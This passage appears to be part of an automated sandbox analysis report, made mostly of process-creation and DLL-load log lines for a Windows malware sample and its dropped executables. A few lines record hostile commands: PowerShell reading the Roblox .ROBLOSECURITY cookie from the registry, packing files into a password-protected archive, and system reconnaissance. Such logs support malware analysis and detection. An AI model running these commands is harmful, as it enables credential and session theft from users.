                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeProcess created: C:\Users\Public\Netstat\FuturreApp.exe "C:\Users\Public\Netstat\FuturreApp.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: python3.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: libffi-7.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: sqlite3.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: libcrypto-1_1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: libssl-1_1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: avicap32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: msvfw32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: dciman32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: mmdevapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: ksuser.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: avrt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: audioses.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: midimap.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
